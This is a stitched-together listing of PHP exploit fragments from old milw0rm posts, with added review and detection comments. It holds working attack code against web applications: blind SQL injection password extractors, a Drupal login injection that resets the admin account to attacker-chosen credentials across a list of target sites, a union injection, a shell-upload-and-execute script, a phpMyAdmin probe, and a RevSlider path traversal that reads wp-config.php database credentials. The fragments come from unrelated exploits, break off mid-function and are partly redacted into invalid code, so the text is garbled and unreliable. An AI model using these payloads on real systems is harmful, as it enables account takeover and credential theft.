// Fragment of a blind-SQL-injection password extractor (milw0rm-style listing).
// The character-extraction loop that sat between the echo prefix and the
// trailing newline has been redacted in this corpus ("******"), so the function
// as shown is not valid PHP: the echo statement is syntactically broken and
// $key, $chr and $pos are assigned but never used.  Nothing is reconstructed here.
function run($hostname, $path, $username) {
    // A 16-symbol hexadecimal alphabet; what the redacted loop did with it
    // cannot be told from this fragment.
    $key = "abcdef0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] Password: "******"\n\n";
}
// Probes for the length of the username by calling the page-provided exploit()
// helper (defined outside this excerpt) once per candidate position; a hit is
// recognised by the "javascript:addToCart" marker in the returned text.  Prints
// and returns the length, or terminates the whole script after 20 misses.
// Detection note: this yields a short burst of requests that differ only in an
// integer position — a generic blind-injection pattern worth alerting on.
function lengthcolumns($hostname, $path, $chs, $goodid) {
    echo "[+] username length: ";
    $exit = 0;
    $length = 0;
    $pos = 1;
    $chr = 0; // passed through to exploit() unchanged
    while ($exit == 0) {
        $response = exploit($hostname, $path, $pos, $chr, $chs, $goodid);
        if (preg_match("/javascript:addToCart/i", $response)) {
            // NOTE(review): $exit = 1 is redundant with the break that follows.
            $exit = 1;
            $length = $pos;
            break;
        } else {
            $pos++;
            if ($pos > 20) {
                // exit() ends the whole script, not just this probe.
                exit("Exploit failed");
            }
        }
    }
    echo $length . "\n";
    return $length;
}
// Fragment: this run sits inside an if/else whose opening is outside this
// excerpt.  It begins with the else branch that defaults the table name and the
// final `else { help(); }` closes that outer if.
} else {
    $table = "wp_users";
}
$host = $argv[1];
$spos = strpos($host, "http://");
// strpos() returns int|false; `!is_int($spos) && $spos == 0` is true only for
// false (loose == 0), i.e. when the scheme prefix is absent.
if (!is_int($spos) && $spos == 0) {
    $host = "http://{$host}";
}
$path = $argv[2];
$pageid = (int) $argv[3];
/* Detecting the version, if possible */
// Reads the plugin's public readme.txt.  There is no `=== false` check, so an
// unreachable target is reported as "Not detectable" rather than as an error.
$version = file_get_contents($host . $path . 'wp-content/plugins/wp-e-commerce/readme.txt');
preg_match("/Stable tag: (.*)/", $version, $vmatch);
if (!isset($vmatch[1])) {
    $version = "Not detectable\n";
} else {
    $version = $vmatch[1];
}
echo "Version: " . $version . "\n";
/* End of version detecting */
/* Executing exploit */
// Derives a bare second-level host name to guess site-specific table prefixes.
// NOTE(review): if the regex does not match, $hmatch[0] is undefined.
preg_match('/[^.]+\\.[^.]+$/', $host, $hmatch);
$host_name = str_replace('http://', '', $hmatch[0]);
// Candidate user-table names, tried in turn by exploit() (defined elsewhere).
$tarray = array($table, 'wordpress_users', '_users', 'users', 'wpusers', 'wordpressusers', $host_name . '_users', str_replace('.', '', $host_name) . '_users', str_replace('.', '', $host_name) . 'users');
foreach ($tarray as $index => $val) {
    echo exploit($host, $path, $pageid, $val);
}
/* End of exploit */
} else {
    help();
}
// Fragment: the first statement is the tail of a function whose signature is
// outside this excerpt; it reports the oracle result (false when the reply
// contains "EXPIERED").
if (preg_match("/EXPIERED/", $reply)) {
    return false;
} else {
    return true;
}
}
if ($argc != 4) {
    usage();
}
$host = $argv[1];
$path = $argv[2];
$func = $argv[3];
$key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; //add a bigger char set if you can't get the username
$pos = 1;
$chr = 0;
echo "[☢] Creds: ";
// Character-at-a-time extraction driven by the exploit() oracle (defined
// outside this excerpt): for each position up to 32, candidates from $key are
// tried until one is accepted, then the position advances.
// NOTE(review): $chr has no upper bound; if no candidate is accepted at a
// position, $key[$chr] runs past the end of the string (empty offset with a
// warning) and the loop never terminates.
// Detection note: the server sees a burst of requests that differ only by one
// position/character pair — a generic blind-injection signature.
while ($pos <= 32) {
    if (exploit($host, $path, $func, $pos, $key[$chr])) {
        echo $key[$chr];
        $chr = 0;
        $pos++;
    } else {
        $chr++;
    }
}
echo "\n";
?> # milw0rm.com [2009-01-26]
// Fragment: the first statements close a function whose signature is outside
// this excerpt; it closes the socket and reports the oracle result (false when
// the reply contains the `"#FFFFFF"> em </font>` marker).
fclose($fp);
if (preg_match("/\"#FFFFFF\"> em <\\/font>/", $reply)) {
    return false;
} else {
    return true;
}
}
if ($argc != 4) {
    usage();
}
$hostname = $argv[1];
$path = $argv[2];
$username = $argv[3];
// A 16-symbol hexadecimal alphabet.  The extraction loop that used it has been
// redacted in this corpus ("******"), so the echo below is not valid PHP and
// $pos/$chr are never used.
$key = "abcdef0123456789";
$pos = 1;
$chr = 0;
echo "[+] Password: "******"\n\n";
?> # milw0rm.com [2009-01-22]
// Fragment: the first statements are the tail of an upload handler whose
// signature is outside this excerpt — it prints a file-upload form and moves
// the uploaded file unconditionally ($filetmp/$filename are set outside the view).
echo "<form method='POST' enctype='multipart/form-data'>\n <input type='file'name='file' />\n <input type='submit' value='drupal !' />\n</form>";
move_uploaded_file($filetmp, $filename);
}
error_reporting(0); // hides every warning, including failures of the network call below
if (isset($_POST['submit'])) {
    // Declared conditionally, so exploit() exists only on a submitted request.
    // Posts a crafted login form to <url>/user/login/ in which the *array key*
    // of the `name` field carries an SQL statement rewriting the uid-1 account.
    // Defender's view: a POST to /user/login whose `name[` key contains SQL
    // keywords is a precise log/WAF signature; the web-root file exploited.txt
    // written below is an artifact to look for on attacker-controlled hosts.
    function exploit($url) {
        $post_data = "name[0;update users set name %3D 'AnonCoders' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
        $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded\n", 'content' => $post_data));
        $ctx = stream_context_create($params);
        // NOTE(review): the second argument (use_include_path) should be false,
        // not null, and the result is never checked for `=== false`.
        $data = file_get_contents($url . '/user/login/', null, $ctx);
        // Success heuristic: either the mb_strlen() warning text or the echoed
        // field values appear in the reply.  `&&` binds tighter than `||`.
        if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data || stristr($data, 'FcUk Crap') && $data) {
            // Appended to exploited.txt next to this script; fopen() is unchecked.
            $fp = fopen("exploited.txt", 'a+');
            fwrite($fp, "Exploitied User: AnonCoders Pass: admin =====> {$url}/user/login");
            fwrite($fp, "\n");
            fwrite($fp, "--------------------------------------------------------------------------------------------------");
            fwrite($fp, "\n");
            fclose($fp);
            echo "<font color='gold'><b>Success:<font color='red'> AnonCoders</font> Pass:<font color='red'> admin</font> =><a href='{$url}/user/login' target=_blank ><font color='green'> {$url}/user/login </font></a></font></b><br>";
        } else {
            echo "<font color='red'><b>Failed => {$url}/user/login</font></b><br>";
        }
    }
    // NOTE(review): $_POST['url'] is read without isset(); one target per line.
    $urls = explode("\n", $_POST['url']);
    foreach ($urls as $url) {
        $url = @trim($url);
        // exploit() returns nothing, so this echo prints an empty string.
        echo exploit($url);
    }
}
echo "<br />";
// NOTE(review): the closing tag is misspelled (`</cenrer>`).
echo '<center><a href="exploited.txt">View Exploited Drupal Sites</a></cenrer>';
// Fragment: the first statement is the tail of a function whose signature is
// outside this excerpt (false when the captured group $x[1] is blank).
if (strlen(trim($x[1])) == 0) {
    return false;
} else {
    return true;
}
}
// Prints the banner and usage line, then terminates the script.
function usage() {
    echo "\n[+] phpMDJ <= 1.0.3 Blind SQL Injection Exploit"
        . "\n[+] Author: darkjoker"
        . "\n[+] Site : http://darkjoker.net23.net"
        . "\n[+] Usage : php xpl.php <hostname> <path> <username>"
        . "\n[+] Ex. : php xpl.php localhost /phpMDJ admin"
        . "\n\n";
    exit;
}
if ($argc != 4) {
    usage();
}
$hostname = $argv[1];
$path = $argv[2];
$user = $argv[3];
// A 16-symbol hexadecimal alphabet.  The extraction loop that used it has been
// redacted in this corpus ("******"), so the echo below is not valid PHP and
// $pos/$chr are never used.
$key = "abcdef0123456789";
$pos = 1;
$chr = 0;
echo "[+] Password: "******"\n\n";
# milw0rm.com [2009-01-11]
// Relaxes error/time limits for a long-running network session; note that
// error_reporting(0) also hides failures of the socket calls that follow.
error_reporting(0);
set_time_limit(0);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 10);
// CLI arguments: target URL and the command to run afterwards.
// NOTE(review): neither argument is checked for presence.
$url = $argv[1];
$cmd = $argv[2];
$url_parts = parse_url($url);
// NOTE(review): parse_url() returns false on malformed input, after which
// 'host' and 'path' are read from a non-array.
$host = $url_parts['host'];
$path = $url_parts['path'];
if (isset($url_parts['port'])) {
    $port = $url_parts['port'];
} else {
    $port = 80;
}
echo "[~] Uploading shell... ";
// exploit() and cmd() are declared later in the file (PHP hoists unconditional
// top-level function declarations, so calling them here is fine).
exploit($host, $path, $port) ? print "OK\n" : die("Failed\n");
echo "[~] Executing command... ";
$res = cmd($host, $path, $port, $cmd);
if ($res) {
    // Prints the result framed by two 65-character dash rules.
    printf("OK\n%'-65s\n%s%'-65s\n", '', $res, '');
} else {
    die("Failed");
}
// Fragment: exploit() continues past the end of this excerpt.  The visible part
// opens a raw socket and starts a multipart/form-data body with a fixed
// boundary string — a constant like that is an easy network signature.
function exploit($host, $path, $port) {
    $ock = fsockopen(gethostbyname($host), $port);
    if (!$ock) {
        return false;
    }
    $data = "--------bndry31337\r\n";
    $data .= "Content-Disposition: form-data; ";
// Pulls a quoted value out of the text returned by the page-provided exploit()
// helper (defined outside this excerpt): returns whatever follows a quote and
// a digit up to the next quote, or the literal "Can't Get\r\n" if absent.
// NOTE(review): both branches return on the first pass, so the while loop and
// the $exit flag are dead scaffolding — the body runs exactly once.
function GetUser($hostname, $path, $c) {
    $tmp = array();
    $exit = 0;
    while ($exit == 0) {
        $response = exploit($hostname, $path, 1, $c - 1, 2);
        // After PHP string unescaping the pattern is /\'\d(.*?)\'/i
        if (preg_match("/\\'\\d(.*?)\\'/i", $response, $tmp)) {
            $exit = 1;
            return $tmp[1];
        } else {
            return "Can't Get\r\n";
        }
    }
}
<?php
#
# Name : Galleristic v1.0 (index.php cat) Remote SQL Injection Exploit
# Author : cOndemned
# Note : works only when magic_quotes_gpc = off
# Greetz : irk4z, GregStar, ZaBeaTy, Iwan, ElusiveN, doctor, Avantura ;*
#
// Fetches index.php with an injected `cat` parameter that unions one
// gallery_settings row (id $v) into the page, then returns the first
// single-quoted value found before a closing </h2>; returns null implicitly
// when nothing matches.
// Defender's view: the request is a GET whose `cat` value starts with a quote
// and contains "union select" — trivially matchable by a WAF rule — and the root
// cause is string concatenation of `cat` into SQL; casting `cat` to int or
// using a prepared statement closes it.
function exploit($target, $v) {
    $injection = "/index.php?cat='-1+union+select+value+from+gallery_settings+where+id=" . $v . "/*";
    // NOTE(review): file() returns false on failure; count(false) throws on PHP 8.
    $request = file($target . $injection);
    for ($i = 0; $i < count($request); $i++) {
        preg_match('/\'(.*)\'<\\/h2>/', $request[$i], $response);
        if (!empty($response[1])) {
            return $response[1] . '<br />';
        }
    }
}
# Usage : Run in a browser as : http://[yourbox]/exploit.php?target=http://[targetbox]/[path]/
// Web-facing driver: the target comes from the `target` query parameter; rows
// 1 and 2 are fetched and echoed unescaped into the page.
if (empty($_GET['target'])) {
    die('No target site specified!');
} else {
    for ($c = 1; $c < 3; $c++) {
        echo exploit($_GET['target'], $c);
    }
}
?> # milw0rm.com [2008-05-07]
// Fragment: the opening statements are the tail of an option-parsing if/else
// whose start is outside this excerpt.
// NOTE(review): $opts[m], $opts[o], $opts[d] use bare undefined constants as
// keys; PHP < 8 silently treats them as "m"/"o"/"d", PHP 8 throws an Error.
$met = $opts[m];
}
if ($opts[o]) {
    $file = $opts[o];
}
if ($opts[d]) {
    $dir = $opts[d];
}
$cookies = '';
$delay = $min = $max = $mid = 0;
$fld1 = $fld2 = '';
if (!$forum) {
    die("[X] You haven't specified any forum type!\n");
}
echo "[+] Target: {$url} [{$forum}]\n\n";
// Dispatches to the forum-specific routine; exploit() is defined outside this excerpt.
exploit();
// Fragment: exploit_gallery() continues past the end of this excerpt.  The
// visible part builds an injected `iden` value for
// index.php?ind=gallery&op=edit_file from the get_sql() template (defined
// elsewhere), sends it via Send() (also elsewhere) and aborts on the two error
// pages it recognises.  State is shared through globals rather than parameters.
function exploit_gallery($f) {
    global $cookies, $url, $fld1, $fld2;
    $sql = get_sql($f);
    $str = "NULL," . $fld1 . "," . $fld2 . ",NULL,NULL";
    $req = sprintf($sql, $str);
    $u = $url . "index.php?ind=gallery&op=edit_file&iden=" . urlencode($req);
    $html = Send($u, NULL, $cookies);
    if (strstr($html, "ERROR: Database error")) {
        die("[X] SQL Query Error.. probably wrong table prefix\n");
    } else {
        if (strstr($html, "<title>Error</title>")) {
            die("[X] This method failed. Try something else\n");
        }
    }
// Fragment: the opening statements close an argument-parsing if/else whose
// start is outside this excerpt.
$album = $argv[3];
} else {
    credits();
}
}
$page = 'thumbnails.php?album=' . $album;
$GLOBALS['album'] = $album;
echo "[+] Valid album number: " . $album . "\n";
// getCookie/getPrefix/sendit/toPage/toCookie/check/exploit/credits are all
// defined outside this excerpt; $firstReply and $c_cookies are set earlier.
$GLOBALS['cookies'] = getCookie($firstReply); ### get cookie from host
$prefix = getPrefix($GLOBALS['cookies']); ### get cookie prefix
echo "[+] Cookie prefix: " . $prefix . "\n";
$GLOBALS['prefix'] = $prefix;
$etalon = toPage(sendit($page, 'GET', $c_cookies)); ### number of images at etalon page
// Canary: the injected value (apparently delivered through a cookie, per
// toCookie()) must make the known-valid album disappear before the target is
// treated as vulnerable.
$first_sql = '0) UNION SELECT ' . $album . ' AND 1=1/*'; ### FIRST sql query - let's make valid album to be invisible
$first_cookie = toCookie($first_sql);
if (check($first_cookie) == 0) {
    echo "exploit failed...";
    credits();
} ### if album is still visible - site is unvulnerable
// Extracts the two columns in turn.
exploit('name');
exploit('password');
credits();
?> # milw0rm.com [2008-01-22]
// Checks whether $url looks like an exposed phpMyAdmin install — both
// scripts/setup.php and config/config.inc.php answer 200 and the setup page
// mentions "token" — logs the verdict to pmaPWN.log and, on a hit, hands the
// URL to exploit() (defined outside this excerpt).
// NOTE(review): curl_exec() returns false on failure; preg_match() on false is
// just a non-match, so unreachable hosts are logged as "not vulnerable".
// NOTE(review): fopen() results are unchecked; FOpen/FWrite/FClose resolve only
// because PHP function names are case-insensitive.
// Defender's view: a reachable scripts/setup.php is the whole signal, so
// removing or access-restricting the setup directory defeats the probe, and
// two back-to-back GETs for those paths are an easy log signature.
function exploit_site($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1); // headers kept so "200 OK" can be grepped
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_URL, $url . "scripts/setup.php");
    $result = curl_exec($ch);
    curl_close($ch);
    $ch2 = curl_init();
    curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch2, CURLOPT_HEADER, 1);
    curl_setopt($ch2, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch2, CURLOPT_URL, $url . "config/config.inc.php");
    $result2 = curl_exec($ch2);
    curl_close($ch2);
    //print $url;
    if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
        print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
        print "\n[+] Exploiting, wait sec..\n";
        $Handlex = FOpen("pmaPWN.log", "a+");
        FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
        FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
        FClose($Handlex);
        exploit($url);
    } else {
        $Handlex = FOpen("pmaPWN.log", "a+");
        print "\n[-] Shit! no luck.. not vulnerable\n";
        FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
        FClose($Handlex);
    }
}
<?php
// Target comes from the first CLI argument; NOTE(review): no presence check.
$target = $argv[1];
// Request shape the probe relies on:
//   /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
// Defender's view: an `img` parameter carrying a path traversal on that
// action is a high-signal log/WAF indicator for this plugin's file read.
define('wp_file', "../wp-config.php");
define('wp_args', "?action=revslider_show_image&img=");
define('wp_path', "/wp-admin/admin-ajax.php");
print "\n[!] Set target > {$target} \n\n";
// parseUrl() (presumably assembles the URL from the constants above) and
// notVuln() are defined outside this excerpt.
$url = parseUrl($target);
$init = curl_init($url);
curl_setopt($init, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($init);
$code = curl_getinfo($init, CURLINFO_HTTP_CODE);
// A 200 alone is taken as "possibly vulnerable"; exploit() then inspects the body.
if ($code == 200) {
    exploit($data);
} else {
    notVuln();
}
// Fragment: exploit() continues past the end of this excerpt.  The visible part
// collects every line of the fetched body that contains "DB_" (wp-config.php's
// DB_* constants); an empty result is reported as not vulnerable.
// NOTE(review): split() was removed in PHP 7, so this only runs on PHP 5.
function exploit($data) {
    $lines = split("\n", $data);
    $rest = array();
    foreach ($lines as $line) {
        $data = split("DB_", $line); // shadows the parameter after it has been consumed
        if (!empty($data[1])) {
            $rest[] = "(DB_" . $data[1] . "\n";
        }
    }
    if (empty($rest)) {
        notVuln();
    } else {
        print "\n[!] VULNERABLE!!!\n\n";
// Probes for the username length by calling the page-provided exploit() oracle
// (defined outside this excerpt) with an increasing $pos until it answers true;
// prints and returns that position.
// NOTE(review): unlike the bounded variant of this function elsewhere in the
// listing, there is no upper limit — if the oracle never answers true this
// loops forever.  $exit is redundant with a plain break.
function lengthcolumns($hostname, $path, $chs) {
    echo "[+] username length: ";
    $exit = 0;
    $length = 0;
    $pos = 0; // starts at 0, so a zero-length answer is representable
    $chr = 0; // passed through to exploit() unchanged
    while ($exit == 0) {
        if (exploit($hostname, $path, $pos, $chr, $chs)) {
            $exit = 1;
            $length = $pos;
        } else {
            $pos++;
        }
    }
    echo $length . "\n";
    return $length;
}